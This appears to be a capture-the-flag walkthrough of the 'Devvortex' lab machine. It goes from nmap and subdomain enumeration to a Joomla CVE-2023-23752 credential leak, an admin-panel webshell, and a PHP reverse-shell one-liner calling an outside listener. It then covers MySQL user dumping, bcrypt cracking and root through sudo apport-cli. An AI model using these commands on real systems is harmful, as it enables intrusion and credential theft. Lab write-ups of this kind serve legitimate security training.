Devvortex

Enumeration
nmap -A -p- -sC -sV -Pn -v devvortex.htb
Nmap scan report for devvortex.htb (10.10.11.242)
Host is up (0.048s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: DevVortex
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/5%OT=22%CT=1%CU=38991%PV=Y%DS=2%DC=T%G=Y%TM=65C16
OS:2D7%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST
OS:11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)
Uptime guess: 34.562 days (since Tue Jan 2 04:06:17 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 45.82 ms 10.10.14.1
2 45.89 ms devvortex.htb (10.10.11.242)
NSE: Script Post-scanning.
Initiating NSE at 17:36
Completed NSE at 17:36, 0.00s elapsed
Initiating NSE at 17:36
Completed NSE at 17:36, 0.00s elapsed
Initiating NSE at 17:36
Completed NSE at 17:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.77 seconds
Raw packets sent: 66004 (2.908MB) | Rcvd: 65653 (2.635MB)
Port 80

Enumerating any hidden directories or files seems to not reveal any important hint:
gobuster dir -u http://devvortex.htb/ -w /usr/share/wordlists/dirb/common.txt

Also enumerating based on extensions of backend technology:
ffuf -u http://devvortex.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt -ic -t 400 -e .php,.html,.txt

Further we did DNS enumeration for the devvortex.htb website using Host
Header enumeration, which showed us the existance of a new domain dev.devvortex.htb
:
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://devvortex.htb/ -H "Host: FUZZ.devvortex.htb" -mc 200

Add the vhost dev.devvortex.htb to /etc/hosts and enumerate it:

Try to enumerate some hidden directories:
gobuster dir -u http://dev.devvortex.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100

/robots.txt:

/administrator:

We can enumerate the version of Joomla simply visiting this file:
/administrator/manifests/files/joomla.xml

/api:


Info
nginx/1.18.0 (Ubuntu)
vhost dev.devvortex.htb
Joomla 4.2.6
/api enabled
Exploitation
Finding if this version of Joomla is vulnerable, we can try this exploit:
The CVE-2023-23752 Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.
We need to install Ruby dependecies:

Download Gemfile, install dependencies using bundle install
and run exploit:


Info
Database info
username:
lewis
password:
P4ntherg0t1n5r3c0n##
db name: joomla
db type: mysql
db prefix: sd4fg_
Enumeration 2
Access /administrator section of Joomla using lewis credentials:

Add a new file cmd.php
with your preferred webshell:


List OS users:
cat /etc/passwd

We need to spawn a reverse shell in order to have a semi-TTY and interact with MySQL database:
php -r '$sock=fsockopen("10.10.15.101",9000);exec("sh <&3 >&3 2>&3");'

python3 -c 'import pty;pty.spawn("/bin/bash")';
Enumerate on MySQL:
mysql -u lewis -p

List tables:
use joomla;
SHOW TABLES;

List all users:
SELECT * FROM sd4fg_users;

logan paul | logan | [email protected] | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12
Try to crack this password with hashcat.
Identify the mode:
hashcat --identify logan.hash

Crack it:
hashcat -m 3200 logan.hash /usr/share/wordlists/rockyou.txt

Privilege Escalation (logan)
Login in SSH using logan:tequieromucho
credential

Verify what commands logan can run using sudo:


A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege. It is extremely unlikely that a system administrator would configure sudo to allow unprivileged users to perform this class of exploit.
To generate a .crash report, run a simple command like this one:
sleep 60 &
Note the PID:

Send SIGSEGV
signal:
kill -SIGSEGV 18640


To spawn a root shell, wait that the pager less
provide to you the command prompt ':'
and then type /bin/bash

Now we're finally root:

Last updated